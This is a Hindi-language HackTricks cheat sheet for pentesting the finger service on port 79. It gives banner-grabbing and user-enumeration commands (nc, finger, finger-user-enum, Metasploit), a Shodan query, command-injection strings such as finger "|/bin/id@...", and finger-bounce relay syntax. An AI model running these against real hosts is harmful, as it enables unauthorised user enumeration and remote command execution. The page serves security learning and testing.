hacktricks/network-services-pentesting/pentesting-finger.md

79 lines
6.2 KiB
Markdown

# 79 - पेंटेस्टिंग फिंगर
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
## **मूल जानकारी**
**फिंगर** प्रोग्राम/सेवा का उपयोग कंप्यूटर उपयोगकर्ताओं के बारे में विवरण प्राप्त करने के लिए किया जाता है। सामान्यत: प्रदान की जाने वाली जानकारी में **उपयोगकर्ता का लॉगिन नाम, पूरा नाम** और, कई मामलों में, अतिरिक्त विवरण शामिल हो सकते हैं। ये अतिरिक्त विवरण कार्यालय स्थान और फोन नंबर (यदि उपलब्ध है), उपयोगकर्ता ने कब लॉग इन किया, निष्क्रिय समय की अवधि (आइडल समय), उपयोगकर्ता द्वारा अंतिम बार मेल पढ़ा गया, और उपयोगकर्ता की योजना और परियोजना फ़ाइलों की सामग्री शामिल हो सकती है।
**डिफ़ॉल्ट पोर्ट:** 79
```
PORT STATE SERVICE
79/tcp open finger
```
## **जांच**
### **बैनर ग्रबिंग/मूल कनेक्शन**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
### **उपयोगकर्ता गणना**
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
आप **finger-user-enum** का उपयोग कर सकते हैं [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) से, कुछ उदाहरण:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap डिफ़ॉल्ट स्क्रिप्ट का उपयोग करने के लिए एक स्क्रिप्ट को निष्पादित करता है**
### Metasploit Nmap से अधिक तरीके का उपयोग करता है
```
use auxiliary/scanner/finger/finger_users
```
### शोडन
* `port:79 USER`
## कमांड निष्पादन
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## फिंगर बाउंस
[एक सिस्टम का उपयोग एक फिंगर रिले के रूप में करें](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>